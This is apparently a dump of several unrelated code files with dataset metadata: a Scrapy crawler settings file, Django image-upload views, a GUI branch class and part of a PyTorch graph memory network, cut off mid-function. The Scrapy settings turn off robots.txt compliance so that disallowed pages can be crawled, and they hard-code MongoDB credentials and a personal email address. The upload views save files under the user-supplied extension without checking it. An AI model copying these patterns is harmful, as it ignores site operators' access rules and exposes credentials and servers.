-*-\n\n# Scrapy settings for srppro project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. 
You can find more settings consulting the documentation:\n#\n# https://doc.scrapy.org/en/latest/topics/settings.html\n# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'srppro'\n\nSPIDER_MODULES = ['srppro.spiders']\nNEWSPIDER_MODULE = 'srppro.spiders'\n\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n#USER_AGENT = 'srppro (+http://www.yourdomain.com)'\n\n# Obey robots.txt rules\n# 不遵循robots.txt的规范,如可以抓取网站中不允许的页面\nROBOTSTXT_OBEY = False\n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n# 并发request请求数量\n#CONCURRENT_REQUESTS = 32\n\n# Configure a delay for requests for the same website (default: 0)\n# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\n# 延时并不是精确的,因为精确的请求同样会被反爬虫检测到,\n# 所以在每个延时中间添加随机的偏移量\n# 也可以单独设置某个spider的download_delay属性\nDOWNLOAD_DELAY = 1\n# The download delay setting will honor only one of:\n# 同一时刻对同一domain发起的请求数\nCONCURRENT_REQUESTS_PER_DOMAIN = 1\n#CONCURRENT_REQUESTS_PER_IP = 16\n\n# Disable cookies (enabled by default)\n# 除非必要,不然禁用cookie,其会消耗cpu\nCOOKIES_ENABLED = False\n# 显示发送的cookie及接收的cookie\nCOOKIES_DEBUG = False\n\n# 日志级别\nLOG_LEVEL = 'DEBUG'\n\n# Disable Telnet Console (enabled by default)\nTELNETCONSOLE_ENABLED = True\n\n# telnet配置\nTELNETCONSOLE_PORT = [6023, 6073]\nTELNETCONSOLE_HOST = '127.0.0.1'\n\n# Override the default request headers:\n# 默认请求头\n#DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n#}\n\n# Enable or disable spider middlewares\n# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n#SPIDER_MIDDLEWARES = {\n# 'srppro.middlewares.SrpproSpiderMiddleware': 543,\n#}\n\n# Enable or disable downloader middlewares\n# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n#DOWNLOADER_MIDDLEWARES = {\n# 'srppro.middlewares.SrpproDownloaderMiddleware': 543,\n#}\n\n# None为不启用,有些中间件会默认开启,可以在这里指定禁用\n# 中间件可能都会处理request与response,所以处理顺序是很重要的\nDOWNLOADER_MIDDLEWARES = {\n #'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': 127,\n 'srppro.middlewares.UAPOOLS': 128,\n #'srppro.middlewares.ProxyMiddleware': 129,\n}\n\n# Enable or disable extensions\n# See https://doc.scrapy.org/en/latest/topics/extensions.html\n# 通用扩展,其他通用扩展还有logstats基本统计信息扩展,发送邮件,内存调试扩展等,\n# None不启用,但扩展可能也会受到其他设置的影响,导致扩展不生效\n# 如以下TelnetConsole扩展依赖TELNETCONSOLE_ENABLED\n# 有些扩展如果依赖项设置了,则会默认开启\n# 扩展在scrapy启动时被初始化\nEXTENSIONS = {\n #'scrapy.extensions.telnet.TelnetConsole': 1,\n #'scrapy.extensions.closespider.CloseSpider': 1,\n #'scrapy.extensions.statsmailer.StatsMailer': 1,\n #'srppro.extensions.RedisSpiderSmartIdleClosedExensions':1,\n}\n\n# Configure item pipelines\n# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n#ITEM_PIPELINES = {\n# 'srppro.pipelines.SrpproPipeline': 300,\n#}\n\nITEM_PIPELINES = {\n #'srppro.pipelines.SrpproPipeline': 300,\n 'srppro.pipelines.MongoPipeline': 301,\n #'srppro.pipelines.CSDNImagesPipeline': 302,\n # 使用redis存储,数据量大的时候不建议使用redis存储\n # redis基于内存,常用与存取频繁访问的数据\n #'scrapy_redis.pipelines.RedisPipeline': 303,\n #'srppro.pipelines.XmlExportPipeline': 304,\n #'srppro.pipelines.JsonLineExportPipeline': 305,\n}\n\nSPIDER_CONTRACTS = {\n 'srppro.contracts.HeaderCheck':10,\n}\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See 
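On the jitter point made in the comments above: Scrapy already multiplies DOWNLOAD_DELAY by a random factor between 0.5 and 1.5 unless RANDOMIZE_DOWNLOAD_DELAY is switched off, and a single spider can override these knobs locally instead of changing the project settings. A small sketch (the spider name is illustrative):

import scrapy

# settings.py: keep the built-in jitter on (it defaults to True)
RANDOMIZE_DOWNLOAD_DELAY = True

# or per spider, overriding the project-wide values:
class SlowSpider(scrapy.Spider):
    name = 'slow'
    custom_settings = {
        'DOWNLOAD_DELAY': 3,
        'CONCURRENT_REQUESTS_PER_DOMAIN': 1,
    }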
https://doc.scrapy.org/en/latest/topics/autothrottle.html\n# 根据爬取的网站的负载自动限制爬取速度。\n#AUTOTHROTTLE_ENABLED = True\n# The initial download delay\n#AUTOTHROTTLE_START_DELAY = 5\n# The maximum download delay to be set in case of high latencies\n#AUTOTHROTTLE_MAX_DELAY = 60\n# The average number of requests Scrapy should be sending in parallel to\n# each remote server\n#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0\n# Enable showing throttling stats for every response received:\n#AUTOTHROTTLE_DEBUG = True\n\n# Enable and configure HTTP caching (disabled by default)\n# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n#HTTPCACHE_ENABLED = True\n#HTTPCACHE_EXPIRATION_SECS = 0\nHTTPCACHE_DIR = 'myfile/httpcache'\n# 在缓存中没找到的也不会从网络中下载\n#HTTPCACHE_IGNORE_MISSING = True\n# 不缓存这些scheme的response\n#HTTPCACHE_IGNORE_SCHEMES = ['file', 'https']\n# reponse中有如下返回值的不缓存\n#HTTPCACHE_IGNORE_HTTP_CODES = [500]\n# http缓存放入本地文件中\n#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n# http缓存存入DBM中\nHTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.DbmCacheStorage'\n# 使用Dummy缓存策略,每次都从缓存读取\nHTTPCACHE_POLICY = 'scrapy.extensions.httpcache.DummyPolicy'\n# 使用Dummy缓存策略,根据响应头数据设置缓存\n#HTTPCACHE_POLICY = 'scrapy.extensions.httpcache.RFC2616Policy'\n# 是否进行缓存压缩\n#COMPRESSION_ENABLED = True\n\n# mongodb数据库\nMONGO_URI = 'mongodb://tbq:tbq@192.168.1.102:27017'\nMONGO_DATABASE = 'CSDN'\n\n# 图片参数\nIMAGES_STORE = \"myfile/image\"\nIMAGES_EXPIRES = 2\n# 缩略尺寸\nIMAGES_THUMBS = {\n 'small':(50, 50),\n 'big':(250, 250),\n}\n# 根据大小限制图片下载\nIMAGES_MIN_HEIGHT = 50\nIMAGES_MIN_WIDTH = 50\n\n# closespider扩展配置\n#CLOSESPIDER_ITEMCOUNT = 5\n# CLOSESPIDER_TIMEOUT = 30\n# CLOSESPIDER_PAGECOUNT = 5\n# CLOSESPIDER_ERRORCOUNT = 10\n\n# 邮件扩展配置\nSTATSMAILER_RCPTS = '1764740905@qq.com'\n\n# 发送邮件的服务器\nMAIL_HOST = 'smtp.qq.com'\n# 邮件发送者\nMAIL_FROM = '1764740905@qq.com'\n# 发送端口号\nMAIL_PORT = 25\n# 登录到stmp服务需要的验证信息\nMAIL_PASS = \"\"\nMAIL_USER = \"1764740905@qq.com\"\n\n# 网站连接广度优先爬取设定,默认是深度优先\n# DEPTH_PRIORITY = 1\n# SCHEDULER_DISK_QUEUE = 'scrapy.squeue.PickleFifoDiskQueue'\n# SCHEDULER_MEMORY_QUEUE = 'scrapy.squeue.FifoMemoryQueue'\n\n# 根据response返回码进行网页重定向,重定向会浪费一定时间\nREDIRECT_ENABLED = False\n# REDIRECT_MAX_TIMES = 5\n\n# 根据meta-refresh html标签重定向\nMETAREFRESH_MAXDELAY = 100\n\n# 在所有正常url被抓取完后对超时的url请求或者500错误的request进行重试\nRETRY_ENABLED = False\nRETRY_TIMES = 5\nRETRY_HTTP_CODES = [500, 502, 503, 504, 400, 408]\n\n# 根据meta-fragment html标签查找ajax可爬取页面的中间件\n# 一般为index或者main界面\nAJAXCRAWL_ENABLED = False\n\n# 下载超时\nDOWNLOAD_TIMEOUT = 20\n\n# # 使用scrapy_redis的调度队列,默认是使用scrapy自身的scheduler\n# # SCHEDULER = \"scrapy_redis.scheduler.Scheduler\"\n# # 去重\n# DUPEFILTER_CLASS = \"scrapy_redis.dupefilter.RFPDupeFilter\"\n\n# # 配置服务器地址及密码\n# REDIS_HOST = '127.0.0.1'\n# REDIS_PORT = 6379\n# REDIS_PARAMS = {\n# 'password':'123456'\n# }\n# REDIS_ENCODING = \"utf-8\"\n\n# # 优先级高于REDIS_HOST\n# REDIS_URL = 'redis://:pwd@localhost:6379'\n\n# # 去调度器中获取数据时,如果为空,最多等待时间\n# SCHEDULER_IDLE_BEFORE_CLOSE = 5\n# # 去重规则,在redis中保存时对应的key\n# SCHEDULER_DUPEFILTER_KEY = '%(spider)s:dupefilter'\n# # 调度器中请求存放在redis中的key chouti:requests \n# # SCHEDULER_QUEUE_KEY = '%(spider)s:requests'\n# # 对保存到redis中的数据进行序列化,默认使用pickle\n# SCHEDULER_SERIALIZER = 'scrapy_redis.picklecompat'\n# # 是否在关闭时候保留原来的调度器和去重记录,True=保留,False=清空\n# SCHEDULER_PERSIST = True\n# # 调度器中请求存放在redis中的key chouti:requests\n# #SCHEDULER_QUEUE_KEY = '%(spider)s:requests'\n# # 使用FIFO队列\n# SCHEDULER_QUEUE_CLASS = 'scrapy_redis.queue.SpiderQueue'\n# 使用优先级队列 by score\n# 
SCHEDULER_QUEUE_CLASS = 'scrapy_redis.queue.PriorityQueue'\n# 使用先进先出队列, lpush, rpop()\n# SCHEDULER_QUEUE_CLASS = 'scrapy_redis.queue.FifoQueue'\n# 使用后进先出队列 lpush lpop()\n# SCHEDULER_QUEUE_CLASS = 'scrapy_redis.queue.LifoQueue'\n# 爬取开始时清空爬取队列\n#SCHEDULER_FLUSH_ON_START\n\n# # 如果为True,则使用redis的'spop'进行操作,避免起始网址列表重复\n# REDIS_START_URLS_AS_SET = False\n\n# # 自定义判断队列是否为空的扩展\n# REDISEMPTY_EXT_ENABLED = True","sub_path":"python/PythonApplication/PythonApplication/gerapy/projects/srppro/srppro/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":9009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"176760196","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom article.models import Article, Images\nfrom post.forms import PostForm, UpdateForm\nfrom django.views.generic.edit import FormView\nfrom django.conf import settings\nfrom time import time\nfrom datetime import datetime\n\n# Create your views here.\n\ndef handle_uploaded_file(f, f_name):\n with open(f_name, 'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n\n\nclass PostView(LoginRequiredMixin, FormView):\n login_url = '/login/'\n redirect_field_name = 'next'\n form_class = PostForm\n template_name = 'post/post.html'\n f_pks = []\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n files = request.FILES.getlist('images')\n if form.is_valid():\n if self.f_pks:\n self.f_pks = []\n for f in files:\n tag = str(time()).replace('.', '')\n name = f.name.split('.')[-1]\n f_name = settings.MEDIA_ROOT + '/img/' + tag + '.' + name\n f_url = settings.MEDIA_URL + 'img/' + tag + '.' + name\n handle_uploaded_file(f, f_name)\n image = Images.objects.create(image_url=f_url)\n self.f_pks.append(image.pk)\n return self.form_valid(request, form)\n else:\n return self.form_invalid(request, form)\n\n def form_valid(self, request, form):\n post_article = form.save(commit=False)\n post_article.save()\n title = form.cleaned_data['title']\n new_article = Article.objects.get(title=title)\n for f_pk in self.f_pks:\n url = Images.objects.get(pk=f_pk)\n new_article.image.add(url)\n self.success_url = new_article.get_absolute_url()\n return redirect(self.success_url)\n\n def form_invalid(self, form):\n return render(self.request, 'post/post.html', {'form': form})\n\n\nclass UpdateView(LoginRequiredMixin, FormView):\n login_url = '/login/'\n redirect_field_name = 'next'\n template_name = 'post/update.html'\n pk_url_kwarg = 'article_id'\n form_class = UpdateForm\n f_pks = []\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n files = request.FILES.getlist('images')\n if form.is_valid():\n if self.f_pks:\n self.f_pks = []\n for f in files:\n tag = str(time()).replace('.', '')\n name = f.name.split('.')[-1]\n f_name = settings.MEDIA_ROOT + '/img/' + tag + '.' + name\n f_url = settings.MEDIA_URL + 'img/' + tag + '.' 
+ name\n handle_uploaded_file(f, f_name)\n image = Images.objects.create(image_url=f_url)\n self.f_pks.append(image.pk)\n return self.form_valid(request, form)\n else:\n return self.form_invalid(request, form)\n\n def get_form(self, form_class=None):\n form_class = self.form_class\n pk = self.kwargs.get(self.pk_url_kwarg)\n update_article = Article.objects.get(pk=pk)\n return form_class(instance=update_article, **self.get_form_kwargs())\n\n def form_valid(self, request, form):\n pk = self.kwargs.get(self.pk_url_kwarg)\n form.save()\n article = Article.objects.get(pk=pk)\n last_modified_time = datetime.now()\n article.last_modified_time = last_modified_time\n article.save()\n for f_pk in self.f_pks:\n url = Images.objects.get(pk=f_pk)\n article.image.add(url)\n self.success_url = article.get_absolute_url()\n return redirect(self.success_url)\n\n def form_invalid(self, form):\n return render(self.request, 'post/update.html', {'form': form})\n","sub_path":"post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"391225861","text":"from GUIDataModule import Component\nclass GUIBranch(Component.Component):\n fbusPosition = {}\n tbusPosition = {}\n def __init__(self,centerX,centerY,gid,fbusPositionX,fbusPositionY,tbusPositionX,tbusPositionY):\n super().__init__()\n self.fbusPosition = {}\n self.tbusPosition = {}\n self.init(centerX,centerY)\n self.referenceInstanceGid = gid\n self.name = \"Branch\"\n if tbusPositionX < fbusPositionX:\n self.fbusPosition[\"x\"] = tbusPositionX\n self.fbusPosition[\"y\"] = tbusPositionY\n self.tbusPosition[\"x\"] = fbusPositionX\n self.tbusPosition[\"y\"] = fbusPositionY\n else:\n self.fbusPosition[\"x\"] = fbusPositionX\n self.fbusPosition[\"y\"] = fbusPositionY\n self.tbusPosition[\"x\"] = tbusPositionX\n self.tbusPosition[\"y\"] = tbusPositionY","sub_path":"src/GUIDataModule/GUIBranch.py","file_name":"GUIBranch.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"333319374","text":"# Copyright (c) Facebook, Inc. 
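Both views above name uploads with `str(time()).replace('.', '')`, which can collide when two files arrive in the same tick. A collision-free variant using uuid4, as a sketch that keeps the same MEDIA_ROOT layout (`unique_upload_name` is a hypothetical helper, not part of the views):

import os
import uuid

def unique_upload_name(original_name, media_root):
    """Build a unique destination path, preserving the file extension."""
    ext = original_name.rsplit('.', 1)[-1]
    tag = uuid.uuid4().hex          # effectively collision-free tag
    return os.path.join(media_root, 'img', '{}.{}'.format(tag, ext))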
and its affiliates.\n\nimport torch\nfrom mmf.common.registry import registry\nfrom mmf.models.pythia import Pythia\nfrom mmf.models.memo_net import MemoNet\nfrom mmf.modules.embeddings import (\n ImageFeatureEmbedding,\n MultiHeadImageFeatureEmbedding,\n PreExtractedEmbedding,\n TextEmbedding,\n)\nfrom mmf.modules.layers import MemNNLayer\n# from mmf.modules.layers import EdgeLayer\n# from mmf.modules.layers import NodeLayer\n# from mmf.modules.layers import GlobalLayer\n# from mmf.modules.layers import GraphMemoryLayer\nfrom mmf.modules.layers import GraphLayer\nfrom mmf.modules.fusions import MCB\n# from mmf.modules.layers import MemoLayer\n# from torch_scatter import scatter_mean\n# from torch_geometric.nn import MetaLayer\nfrom torch import nn\nimport numpy as np\nimport cv2\ntorch.autograd.set_detect_anomaly(True)\n\n\n@registry.register_model(\"gmn\")\nclass GraphMemoNet(MemoNet):\n def __init__(self, config):\n super().__init__(config)\n\n @classmethod\n def config_path(cls):\n return \"configs/models/gmn/defaults.yaml\"\n\n def build(self):\n super().build()\n \n self._build_word_embedding()\n self._init_text_embeddings(\"text\")\n self._init_feature_encoders(\"image\")\n self._init_feature_embeddings(\"image\")\n self._init_GMN()\n self._init_MCB()\n # self._init_memo_layer()\n # self._init_MN(\"image\")\n self._init_combine_layer(\"image\", \"text\")\n self._init_classifier(self._get_classifier_input_dim())\n self._init_extras()\n\n def _init_GMN(self):\n self.visual_graph = GraphLayer(\"image\", hidden_dim=2048, node_dim=2048, edge_dim=2048)\n # self.textual_graph = GraphLayer(\"text\", hidden_dim=2048, node_dim=2048, edge_dim=2048)\n # 1204 2048\n # self.memory = \n\n def _init_MCB(self):\n input_dims = [self.config.mcb.visual_input_dim, self.config.mcb.textual_input_dim]\n output_dim = self.config.mcb.output_dim\n self.mcb = MCB(input_dims, output_dim)\n\n def is_adjcent(self, bbox1, bbox2):\n if ((bbox1==[0,0,0,0]) or (bbox2==[0,0,0,0])):\n adj = False\n else:\n d_ecu_convert = (bbox1[0]+bbox1[2]-bbox2[0]-bbox2[2])*(bbox1[0]+bbox1[2]-bbox2[0]-bbox2[2])+(bbox1[1]+bbox1[3]-bbox2[1]-bbox2[3])*(bbox1[1]+bbox1[3]-bbox2[1]-bbox2[3])\n adj = (d_ecu_convert<1.0)\n return adj\n\n # def _init_memo_layer(self, H, W): \n # self.memo_layer = MemoLayer()\n\n\n def process_text_embedding(\n self, sample_list, embedding_attr=\"text_embeddings\", info=None\n ):\n\n # print(\"=====text embedding=====\")\n\n #metadata\n bs = len(sample_list.question_id) \n num_regions_vg = []\n for i in range(bs):\n num_regions_vg.append(len(sample_list.region_description[\"region_id\"][i]))\n \n text_embeddings = []\n embedding_phrase = [[] for i in range (bs)]\n embedding_phrases = []\n # Get \"text\" attribute in case of \"text_embeddings\" case\n # and \"context\" attribute in case of \"context_embeddings\"\n texts = getattr(sample_list, embedding_attr.split(\"_\")[0])\n phrases = sample_list.region_description[\"phrase\"]\n # print(\"text\", texts.size()) # bs*20*300\n # print(\"phrases\", phrases)\n\n # Get embedding models\n text_embedding_models = getattr(self, embedding_attr)\n for text_embedding_model in text_embedding_models:\n # print(\"text_model\", text_embedding_model)\n '''\n text_model TextEmbedding(\n (module): BiLSTM(\n ...\n )\n )\n '''\n # TODO: Move this logic inside\n if isinstance(text_embedding_model, PreExtractedEmbedding):\n embedding = text_embedding_model(sample_list.question_id)\n else:\n embedding = text_embedding_model(texts)\n # print(\"text_embedding: \", embedding.size()) \n 
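The `is_adjcent` test that follows compares the squared distance between box centres, written in terms of corner sums: for a box `[x0, y0, x1, y1]`, `x0 + x1` is twice the centre x, so the expression is `(2*dcx)**2 + (2*dcy)**2 < 1.0` on normalized coordinates. An equivalent, more explicit form as a sketch:

def boxes_adjacent(b1, b2, thresh=1.0):
    """b1, b2 are [x0, y0, x1, y1] in normalized [0, 1] coordinates;
    all-zero boxes (padding) are never adjacent."""
    if b1 == [0, 0, 0, 0] or b2 == [0, 0, 0, 0]:
        return False
    cx1, cy1 = (b1[0] + b1[2]) / 2, (b1[1] + b1[3]) / 2
    cx2, cy2 = (b2[0] + b2[2]) / 2, (b2[1] + b2[3]) / 2
    # same test as above: (2*dx)**2 + (2*dy)**2 < thresh
    return 4 * ((cx1 - cx2) ** 2 + (cy1 - cy2) ** 2) < thresh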
# torch.Size([4(bs), 2048attn/1280gnu])\n for i in range(bs):\n for j in range (num_regions_vg[i]):\n embedding_phrase[i].append(text_embedding_model(phrases[i][j].unsqueeze(0))) \n # print(embedding_phrase[i][j].size()) # torch.Size([1,2048/1280])\n #[50,50,49,49*tensors]\n\n text_embeddings.append(embedding)\n embedding_phrases.append(embedding_phrase) \n \n # cat different embedding models(only 1 model here)\n text_embeddding_total = torch.cat(text_embeddings, dim=1)\n # print(\"text_embedding_tot: \", text_embeddding_total.size()) # torch.Size([4(bs), 2048])\n # embedding_phrase_total = torch.cat(embedding_phrases, dim=0)\n embedding_phrase_total = embedding_phrases # cannot cat a list, [1,4,50/49*[1,2048]]\n # print(len(embedding_phrase_total))\n # print(len(embedding_phrase_total[0]))\n # print(len(embedding_phrase_total[0][0]))\n\n return text_embeddding_total, embedding_phrase_total\n\n \n def process_feature_embedding(\n self, attr, sample_list, text_embedding_total, embedding_phrase_total, extra=None, batch_size_t=None\n ):\n if extra is None:\n extra = []\n feature_embeddings = []\n feature_attentions = [] #useless var\n features = []\n batch_size_t = (\n sample_list.get_batch_size() if batch_size_t is None else batch_size_t\n )\n # print(batch_size_t)\n\n ## metadata\n bs = len(sample_list.question_id) \n num_regions_vg = []\n for i in range(bs):\n num_regions_vg.append(len(sample_list.region_description[\"region_id\"][i]))\n\n ## Convert list of keys to the actual values\n extra = sample_list.get_fields(extra)\n ## bboxes\n bbox_phrase_width = sample_list.region_description[\"width\"]\n bbox_phrase_height = sample_list.region_description[\"height\"]\n bbox_phrase_x = sample_list.region_description[\"x\"]\n bbox_phrase_y = sample_list.region_description[\"y\"]\n bbox_phrase = [[] for i in range (bs)]\n for i in range (bs):\n for j in range (num_regions_vg[i]):\n bbox_phrase[i].append([bbox_phrase_x[i][j], bbox_phrase_y[i][j], bbox_phrase_x[i][j]+bbox_phrase_width[i][j], bbox_phrase_y[i][j]+bbox_phrase_height[i][j]])\n # bbox_phrase_width = torch.tensor(sample_list.region_description[\"width\"]).cuda()\n # bbox_phrase_height = torch.tensor(sample_list.region_description[\"height\"]).cuda()\n # bbox_phrase_x = torch.tensor(sample_list.region_description[\"x\"]).cuda()\n # bbox_phrase_y = torch.tensor(sample_list.region_description[\"y\"]).cuda()\n # bbox_phrase_x1 = torch.add(bbox_phrase_width, bbox_phrase_x)\n # bbox_phrase_y1 = torch.add(bbox_phrase_height, bbox_phrase_y)\n # bbox_phrase = torch.stack(bbox_phrase_x, bbox_phrase_y, bbox_phrase_x1, bbox_phrase_y1)\n # print(\"bbox_phrase\",bbox_phrase)\n bbox_feature = torch.tensor(sample_list.image_info_0[\"bbox\"]).cuda() # [bs, 100, 4] \n # ====print img with bbox==========\n # for i in range (bs):\n # img_src = sample_list.region_description[\"image_url\"][i]\n # cap = cv2.VideoCapture(img_src)\n # if( cap.isOpened() ) :\n # ret,img = cap.read()\n # # cv2.imshow(\"image\",img)\n # # cv2.waitKey()\n # for j in bbox_feature[i]:\n # cv2.rectangle(img, (j[0],j[1]), (j[2],j[3]), (0,255,0), 1)\n # for k in bbox_phrase[i]:\n # p1 = (int(k[0]*sample_list.image_info_0[\"image_width\"][i]),int(k[1]*sample_list.image_info_0[\"image_height\"][i]))\n # p2 = (int(k[2]*sample_list.image_info_0[\"image_width\"][i]),int(k[3]*sample_list.image_info_0[\"image_height\"][i]))\n # print(p1,p2)\n # cv2.rectangle(img, p1, p2, (255,0,0), 1)\n # print(sample_list.region_description[\"image_id\"][i])\n # 
cv2.imwrite(str(sample_list.region_description[\"image_id\"][i].item())+\".jpg\", img)\n for i in range (bs):\n bbox_feature[i, :, 0] /= sample_list.image_info_0[\"image_width\"][i]\n bbox_feature[i, :, 1] /= sample_list.image_info_0[\"image_height\"][i]\n bbox_feature[i, :, 2] /= sample_list.image_info_0[\"image_width\"][i]\n bbox_feature[i, :, 3] /= sample_list.image_info_0[\"image_height\"][i]\n # print(\"bbox_feature\", bbox_feature)\n\n feature_idx = 0\n\n # Get all of the features, which are in the form, \"image_feature_0\"\n # \"image_feature_1\" ...\n while True:\n feature = getattr(sample_list, f\"{attr}_feature_{feature_idx:d}\", None)\n if feature is None:\n break\n # print(\"feature_idx\", feature_idx)\n # print(\"feature1\", feature.size()) # torch.Size([4, 100/196, 2048])\n feature_idx += 1\n feature = feature[:batch_size_t]\n # print(\"feature2\", feature.size())\n features.append(feature)\n\n feature_encoders = getattr(self, attr + \"_feature_encoders\")\n\n # print(\"=====feat encoding=====\")\n # print(\"feat_encoders\", feature_encoders)\n # result: \n # feat_encoders ModuleList(\n # (0): ImageFeatureEncoder(\n # (module): FinetuneFasterRcnnFpnFc7(\n # (lc): Linear(in_features=2048, out_features=2048, bias=True)\n # )\n # )\n # (1): ImageFeatureEncoder(\n # (module): Identity()\n # )\n # )\n\n \n\n # Each feature should have a separate image feature encoders\n assert len(features) == len(feature_encoders), (\n \"Number of feature encoders, {} are not equal \"\n \"to number of features, {}.\".format(len(feature_encoders), len(features))\n )\n\n # Now, iterate to get final attended image features\n encoded_feature = []\n for i, feature in enumerate(features):\n # Get info related to the current feature. info is generally\n # in key of format \"image_info_0\" for 0th feature\n feature_info = getattr(sample_list, f\"{attr}_info_{i:d}\", {})\n # print(\"feature_i: \", i, feature.size()) # torch.Size([4, 100/196, 2048])\n # print(\"feature_info\", feature_info) # {}\n \n # For Pythia, we need max_features to mask attention\n feature_dim = getattr(feature_info, \"max_features\", None)\n if feature_dim is not None:\n feature_dim = feature_dim[:batch_size_t]\n # print(\"feat_dim\", feature_dim) # none\n\n # Attribute in which encoders are saved, for \"image\" it\n # will be \"image_feature_encoders\", other example is\n # \"context_feature_encoders\"\n encoders_attr = attr + \"_feature_encoders\"\n feature_encoder = getattr(self, encoders_attr)[i]\n # Encode the features\n encoded_feature.append(feature_encoder(feature)) \n\n # print(\"encoded_feat:\", i, encoded_feature.size()) # torch.Size([64, 100/196, 2048])\n #feature1--finetune; feat2--identity\n list_attr = attr + \"_feature_embeddings_list\"\n feature_embedding_models = getattr(self, list_attr)[i] # image_feature_embeddings_list\n\n \n # print(\"=====feat_embedding===== \")\n # Forward through these embeddings one by one\n # current data: encoded_feature[0,1], text_embedding_total, embedding_phrase total, feature_dim, extra, bbox_phrase, bbox_feature\n \n # init graph data\n visual_node_features = [[] for i in range (bs)]\n textual_node_features = [[] for i in range (bs)]\n visual_edge_ends = [[] for i in range (bs)]\n textual_edge_ends = [[] for i in range (bs)]\n visual_edge_features = [[] for i in range (bs)]\n textual_edge_features = [[] for i in range (bs)]\n\n visual_edge_feat_dim = 2048 # 2048\n textual_edge_feat_dim = 2048 # 2048\n\n visual_global_features = encoded_feature[1][:,0,:]\n textual_global_features = 
text_embedding_total\n\n ## visual graph init\n for i in range(bs):\n for j in range (len(encoded_feature[0][i])):\n # j-th feature in i-th batch\n # print(\"mcb\", encoded_feature[0][i][j].size(), text_embedding_total[i].size()) # torchsize([2048])\n visual_node_features[i].append((self.mcb( [encoded_feature[0][i][j], text_embedding_total[i]] )).unsqueeze(0)) # [bs, 100, 2048]\n for k in range(len(bbox_feature[i])):\n if self.is_adjcent(bbox_feature[i][j], bbox_feature[i][k]):\n visual_edge_ends[i].append([j,k]) # [bs, num_edges, 2]\n visual_edge_features[i].append(torch.zeros(1,visual_edge_feat_dim))# [bs, num_edges, 2048] \n visual_edge_features[i] = torch.cat(visual_edge_features[i]).cuda(0)\n visual_node_features[i] = torch.cat(visual_node_features[i])\n # visual_nodes[i] = VisualNodeModel(visual_node_features[i])\n # visual_edges[i] = VisualEdgeModel()\n\n ## textual graph init\n # print(embedding_phrase_total[i]) # [1,4,50/49,2048]\n embedding_phrase_total[0][i]=torch.cat(embedding_phrase_total[0][i], dim = 0)\n # print(\"embedding_phrase_total\", embedding_phrase_total[0][0].size())\n # print(\"text_embedding_total\", text_embedding_total[i].size()) \n textual_node_features[i]= (embedding_phrase_total[0][i]*text_embedding_total[i]).unsqueeze(0) # [49, 2048] * [2048] =>[49,2048]\n # textual_node_features = torch.mmf(embedding_phrase_total,text_embedding_total)\n # print(\"num_regions_vg\", num_regions_vg[i], len(bbox_phrase[i]))\n ## edge init\n for j in range (num_regions_vg[i]):\n # textual_node_features[i].append(multiply(embedding_phrase_total[i][j], text_embedding_total[i]))\n for k in range (len(bbox_phrase[i])):\n if self.is_adjcent(bbox_phrase[i][j], bbox_phrase[i][k]):\n textual_edge_ends[i].append([j,k]) # [bs, num_edges, 2]\n textual_edge_features[i].append(torch.zeros(1,textual_edge_feat_dim))# [bs, num_edges, 2048]\n textual_edge_features[i] = torch.cat(textual_edge_features[i]).cuda(0)\n # textual_nodes[i] = TextualNodeModel(extual_node_features[i])\n # textual_edges[i] = TextualEdgeModel()\n # \n visual_node_features[i], visual_edge_features[i], visual_global_features[i] = self.visual_graph(visual_node_features[i], visual_edge_ends[i], visual_edge_features[i], visual_global_features[i])\n # textual_node_features[i], textual_edge_features[i], textual_global_features[i] = self.textual_graph(textual_node_features[i], textual_edge_ends[i], textual_edge_features[i], textual_global_features[i])\n # visual_node_features, visual_edge_features, visual_global_features = self.visual_graph(visual_node_features, visual_edge_ends, visual_edge_features, visual_global_features)\n # textual_node_features, textual_edge_features, textual_global_features = self.textual_graph(textual_node_features, textual_edge_ends, textual_edge_features, textual_global_features)\n\n # print(\"len vis node feat\", len(visual_node_features)) #[4*[100, 2048]]\n # print(\"vis node feat[0]\", visual_node_features[1].size())\n a = torch.cat(visual_node_features, dim = 0).reshape(len(visual_node_features),100,2048)\n encoded_feature[0] = a\n # print(encoded_feature[0].size())\n\n for i, feature in enumerate(features):\n for feature_embedding_model in feature_embedding_models:\n inp = (encoded_feature[i], text_embedding_total, feature_dim, extra)\n # torch.Size([64, 100, 2048]), [64,2048], none, samplelist()\n # print(feature_embedding_model) #attn & identity as listed in yml\n # print(encoded_feature[i].size())\n # print(text_embedding_total.size())\n # print(\"erxtra\", extra) # infos in samplelist with key 
